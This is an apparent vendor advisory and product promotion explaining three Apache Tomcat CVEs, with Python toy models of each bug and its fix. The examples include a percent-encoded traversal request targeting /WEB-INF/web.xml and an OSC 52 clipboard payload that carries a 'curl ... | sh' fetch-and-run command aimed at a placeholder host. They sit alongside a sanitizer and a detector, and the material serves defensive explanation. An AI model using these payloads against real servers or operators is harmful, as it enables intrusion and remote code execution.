Nov 13, 2025

Apache Tomcat October 2025 Vulnerabilities: What You Need to Know

CVE-2025-55752 | CVE-2025-55754 | CVE-2025-61795


In October 2025, three new Apache Tomcat vulnerabilities were disclosed, affecting nearly every major version still in production use:

- CVE-2025-55752: path traversal through the rewrite valve, with possible remote code execution when HTTP PUT is enabled
- CVE-2025-55754: console manipulation through ANSI escape sequences written to Tomcat's logs
- CVE-2025-61795: denial of service through temporary files left behind by failed multipart uploads

Each vulnerability sits in a different part of Tomcat's request handling, but the common thread is exposure for organizations running EOL or unpatched versions: unauthorized access to protected resources (and possibly code execution), manipulation of an operator's console, and disk exhaustion leading to downtime, with the compliance violations that follow from any of them.

HeroDevs’ Never-Ending Support (NES) for Tomcat provides ongoing CVE remediation and fully tested patched binaries—keeping systems secure long after community support ends.

Below, our engineers break down the key questions surrounding these vulnerabilities and how HeroDevs addressed them.

FAQ

What caused the Path Traversal vulnerability (CVE-2025-55752)?

The fix for an earlier bug introduced a regression in Tomcat's rewrite valve: the rewritten URL was normalized before it was percent-decoded. Where a rewrite rule copies query parameters into the URL path, an attacker could therefore hide traversal sequences in a query parameter as encoded characters (for example %2e%2e for ..). Normalization did not recognise them, decoding then turned them into real .. segments, and the request could reach protected locations such as /WEB-INF/ or /META-INF/ that security constraints should have blocked.

Could CVE-2025-55752 lead to Remote Code Execution (RCE)?

Potentially. If HTTP PUT is enabled, for example because the DefaultServlet is configured with readonly set to false in web.xml, an attacker could write files into those directories, which under certain configurations leads to RCE. Worth checking: the DefaultServlet's readonly parameter defaults to true, so PUT is only available where someone has explicitly turned it on. HeroDevs' patch prevents path normalization from being abused in this way.

How does the NES patch resolve CVE-2025-55752?

HeroDevs' patch changes the rewrite logic so that the rewritten URL, including any query parameters copied into it, is percent-decoded before it is normalized. The container then sees the actual path the request refers to, and security constraints are evaluated against that path rather than against an encoded version of it.

What are URL rewrite rules?

URL rewrite rules are logic in an application that translates one URL into another, typically to give users cleaner, more readable addresses. Rewrite rules are often used to move query parameters into the URL path.

For example, a user might request http://somedomain.com/orders?id=123 and the application may rewrite the URL to http://somedomain.com/orders/123.

What is URL normalization?

URL normalization is the process of converting a URL into a consistent, standardized form so that differently written URLs that refer to the same resource are treated the same way. General-purpose normalization covers things like lowercasing the host or dropping default ports and fragment identifiers. The normalization that matters for this vulnerability is path normalization: resolving . and .. segments and collapsing repeated slashes. It recognises only literal . and .. segments, so an encoded %2e%2e passes through untouched unless percent-decoding has already happened, which is why the order of the two steps is security-relevant.
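To make the ordering concrete, here is an added example (not Tomcat's code and not HeroDevs' patch) that models the three questions above as a toy request pipeline: a rewrite rule that copies the id query parameter into the path, a normalizer that resolves . and .. segments, a constraint check for /WEB-INF/ and /META-INF/, and a resource lookup that normalizes again. The rewrite rule, constraint check and resource lookup are simplified stand-ins, and the attack URL is constructed for the example.

```python
"""Model of why the order of percent-decoding and path normalization matters.

Added example, not Tomcat's code: a simplified pipeline mirroring the
regression described for CVE-2025-55752 (rewritten URL normalized before it
was decoded) next to the corrected order (decode, then normalize). The rewrite
rule, the constraint check and the resource lookup are toy stand-ins.
"""
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/web-inf/", "/meta-inf/")


def normalize(path: str) -> str:
    """Resolve '.' and '..' segments and collapse repeated slashes.

    Only literal '.' and '..' segments are recognised, which is exactly why an
    encoded '%2e%2e' slips through when normalization runs before decoding.
    """
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def rewrite(request_target: str) -> str:
    """Toy rewrite rule: /orders?id=X becomes /orders/X (query copied into path)."""
    path, _, query = request_target.partition("?")
    if path == "/orders" and query.startswith("id="):
        return "/orders/" + query[len("id="):]
    return path


def is_protected(path: str) -> bool:
    """Constraint check as a prefix test on the (supposedly) final path."""
    return path.lower().startswith(PROTECTED_PREFIXES)


def serve_resource(path: str) -> str:
    """Stand-in for the resource lookup, which normalizes the path it is given."""
    return normalize(path)


def vulnerable_pipeline(request_target: str) -> str:
    """Normalize first, decode second (the regressed order).

    Returns the path the resource layer finally resolves, or 'BLOCKED' when the
    constraint check fires.
    """
    p = normalize(rewrite(request_target))  # '%2e%2e' is not '..', so it survives
    p = unquote(p)                          # now it is '..', but nothing re-normalizes before the check
    if is_protected(p):
        return "BLOCKED"
    return serve_resource(p)


def fixed_pipeline(request_target: str) -> str:
    """Decode first, normalize second (the corrected order)."""
    p = normalize(unquote(rewrite(request_target)))
    if is_protected(p):
        return "BLOCKED"
    return serve_resource(p)


# Constructed requests: traversal hidden in a percent-encoded query value,
# the same traversal unencoded, and a benign lookup.
ATTACK_ENCODED = "/orders?id=%2e%2e/WEB-INF/web.xml"
ATTACK_PLAIN = "/orders?id=../WEB-INF/web.xml"
BENIGN = "/orders?id=123"

if __name__ == "__main__":
    for target in (ATTACK_ENCODED, ATTACK_PLAIN, BENIGN):
        print(f"{target:40} vulnerable={vulnerable_pipeline(target):20} fixed={fixed_pipeline(target)}")
```

Run it and the encoded request is the only one that differs between the two pipelines: the unencoded .. was always caught by the constraint check, while %2e%2e sails past it in the regressed order and is only resolved to /WEB-INF/web.xml by the resource lookup, after the check has already run.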

How does the Command Injection vulnerability (CVE-2025-55754) work?

On Windows systems, Tomcat logs to consoles that may interpret ANSI escape sequences. A crafted URL could inject escape codes into those logs, potentially altering console behavior or copying malicious commands to an admin’s clipboard.

It is important to note that the attacker can only manipulate the console and clipboard; no code runs on the server. A successful attack depends on tricking an operator into pasting or running an attacker-controlled command.
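The following added example (not Tomcat's code) shows what such a log line looks like when a decoded request target carrying a percent-encoded ESC byte is written verbatim, a small escaping routine that neutralizes control characters before they can reach a console, and a detector that flags CSI and OSC sequences in existing log text. The request path, log format and escaping routine are this example's own; the OSC 52 "set clipboard" sequence is used only to make the clipboard vector concrete, and the payload it carries is constructed.

```python
"""Escape-sequence injection into logs: the payload, a sanitizer, a detector.

Added example, not Tomcat's code. The request path, log format and escape
routine are this example's own. OSC 52 is the xterm-style 'write to clipboard'
control sequence that some consoles honour; it is used here only to make the
clipboard vector concrete.
"""
import base64
import re
from urllib.parse import unquote

ESC = "\x1b"

# Constructed attacker request: a percent-encoded ESC opens an OSC 52 sequence that,
# if the decoded path is echoed to an interpreting console, places a command on the
# operator's clipboard. A trailing SGR reset (ESC [ 0 m) tidies the display.
PAYLOAD_CMD = b"curl http://example.invalid/x | sh"
ATTACK_PATH = "/%1b]52;c;" + base64.b64encode(PAYLOAD_CMD).decode() + "%07%1b[0m"


def format_log_line(client: str, path: str) -> str:
    """Naive logger: writes the decoded request target verbatim (the unsafe pattern)."""
    return f'{client} - - "GET {unquote(path)} HTTP/1.1" 400 -'


def escape_control_chars(text: str) -> str:
    """Replace C0 control characters (including ESC) and DEL with a visible \\xHH
    form so a console never interprets them. Tab is kept because log formats use it."""
    return "".join(
        ch if (ch >= " " and ch != "\x7f") or ch == "\t" else f"\\x{ord(ch):02x}"
        for ch in text
    )


def format_log_line_safe(client: str, path: str) -> str:
    """Same log line, with the request target escaped before it is written."""
    return f'{client} - - "GET {escape_control_chars(unquote(path))} HTTP/1.1" 400 -'


# CSI: ESC [ params intermediates final-byte.  OSC: ESC ] ... terminated by BEL or ST.
_ANSI_RE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)")


def find_escape_sequences(log_text: str) -> list:
    """Return (line_number, [sequence kinds]) for every log line carrying an ANSI
    CSI or OSC sequence: a cheap check to run over logs that already exist."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        found = _ANSI_RE.findall(line)
        if found:
            kinds = ["OSC" if s.startswith(ESC + "]") else "CSI" for s in found]
            hits.append((n, kinds))
    return hits


if __name__ == "__main__":
    unsafe = format_log_line("10.0.0.5", ATTACK_PATH)
    safe = format_log_line_safe("10.0.0.5", ATTACK_PATH)
    print("unsafe line flagged:", find_escape_sequences(unsafe))
    print("safe line flagged:  ", find_escape_sequences(safe))
    print("safe line text:     ", safe)
```

Piping the unsafe line to an interpreting terminal is what the vulnerability relies on; the escaped form prints the sequence as literal text (\x1b]52;c;...), which is also what makes it greppable afterwards.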

Are Linux or containerized Tomcat deployments affected by CVE-2025-55754?

No. The issue is specific to Windows consoles that interpret ANSI escape sequences; Linux and containerized environments are not impacted. Note that a log file on disk is inert: the injected bytes only act when the output is rendered by a console that honours them, so the exposure is the operator's terminal rather than the server itself.

What triggers the Denial of Service vulnerability (CVE-2025-61795)?

A multipart upload that fails part-way, for example because it exceeds a configured limit, leaves behind the temporary files Tomcat had already written for its parts. Tomcat did not delete them immediately; removal was left to garbage collection of the associated objects. Under sustained traffic of failing uploads, the files accumulate faster than they are collected, fill the disk, and cause outages.

How does the NES patch resolve CVE-2025-61795?

HeroDevs’ patch modifies Tomcat’s cleanup logic to immediately delete temporary copies of uploaded files upon failure, preventing accumulation and resource exhaustion.
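As an added example (not Tomcat's code and not the NES patch), the toy multipart handler below spools each part to a temp file and fails once a part limit is exceeded. The leaky variant forgets its files on the failure path, which is the behaviour the two answers above describe; the fixed variant removes them in a finally block. leftover_files() is the kind of check worth running against a real server's temp directory. The part limit, upload data and directory layout are constructed for the example.

```python
"""Failure-path cleanup of multipart upload temp files.

Added example, not Tomcat's code: a toy handler that spools each upload part to
a temp file and raises once a part limit is exceeded. The 'leaky' variant leaves
the spooled files behind on failure (as the page describes Tomcat doing, with
cleanup deferred to garbage collection); the 'fixed' variant deletes them in the
failure path itself. Upload parts are constructed in memory.
"""
import os
import tempfile
from pathlib import Path


class PartLimitExceeded(Exception):
    pass


def spool_part(upload_dir: Path, index: int, data: bytes) -> Path:
    """Write one part to a temp file in the container's upload directory."""
    fd, name = tempfile.mkstemp(prefix=f"upload_{index}_", dir=upload_dir)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return Path(name)


def handle_upload_leaky(upload_dir: Path, parts: list, max_parts: int) -> None:
    """Cleans up on success, but the failure path forgets every file already spooled."""
    spooled = []
    for i, data in enumerate(parts):
        if i >= max_parts:
            # Nothing deletes 'spooled' here; a container that defers this to GC
            # leaves the files on disk until collection eventually happens.
            raise PartLimitExceeded(f"more than {max_parts} parts")
        spooled.append(spool_part(upload_dir, i, data))
    for p in spooled:  # success path: parts consumed, temp copies removed
        p.unlink(missing_ok=True)


def handle_upload_fixed(upload_dir: Path, parts: list, max_parts: int) -> None:
    """Same logic, but every spooled file is removed however the request ends."""
    spooled = []
    try:
        for i, data in enumerate(parts):
            if i >= max_parts:
                raise PartLimitExceeded(f"more than {max_parts} parts")
            spooled.append(spool_part(upload_dir, i, data))
        # On success the application would consume the parts here.
    finally:
        for p in spooled:
            p.unlink(missing_ok=True)


def leftover_files(upload_dir: Path) -> list:
    """Anything still here after requests have finished is disk the server will not
    get back on its own; run the equivalent against a real Tomcat temp directory."""
    return sorted(p.name for p in upload_dir.iterdir() if p.is_file())


def simulate(handler, attempts: int, parts_per_request: int, max_parts: int) -> int:
    """Drive `attempts` uploads through `handler`; return how many temp files remain."""
    parts = [b"x" * 1024] * parts_per_request  # constructed upload body
    with tempfile.TemporaryDirectory() as d:
        upload_dir = Path(d)
        for _ in range(attempts):
            try:
                handler(upload_dir, parts, max_parts)
            except PartLimitExceeded:
                pass  # the client gets a 4xx; what matters here is the disk
        return len(leftover_files(upload_dir))


if __name__ == "__main__":
    print("leaky, 5 oversized uploads:", simulate(handle_upload_leaky, 5, 10, 3), "files left")
    print("fixed, 5 oversized uploads:", simulate(handle_upload_fixed, 5, 10, 3), "files left")
```

With three parts spooled before each of five requests trips the limit, the leaky handler leaves fifteen files behind and the fixed one leaves none; scale the attempt count to request rate and the disk-exhaustion outage follows directly.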

Are these issues being fixed by the Apache Software Foundation?

Yes, for the supported branches: the Apache Software Foundation fixed all three in Tomcat 11.0.11, 10.1.45 and 9.0.109, so earlier releases on those branches are fixed by upgrading to the current release. Tomcat 8.5 reached end of life in March 2024 and receives no upstream fix. HeroDevs NES for Tomcat provides verified patches for versions the community no longer maintains.

How quickly does HeroDevs release patches after a new CVE is published?

HeroDevs continuously monitors upstream commits and security advisories. Patches for critical CVEs are typically developed, tested, and released within days of disclosure.

How are NES patches tested before release?

Each patch undergoes regression testing, CVE exploit verification, and compatibility validation to ensure it can be safely dropped into production without requiring code changes.

How do customers receive NES patches?

NES customers receive access to secured release channels containing version-matched binaries and detailed documentation for compliance tracking and deployment.

Summary

These three vulnerabilities show how small regressions in long-established software can have a large downstream impact, especially for organizations still running EOL versions.

With HeroDevs NES for Tomcat, enterprises maintain security, stability, and compliance through continuous backported patches, without refactoring or risky upgrades.

Learn more about NES for Tomcat →
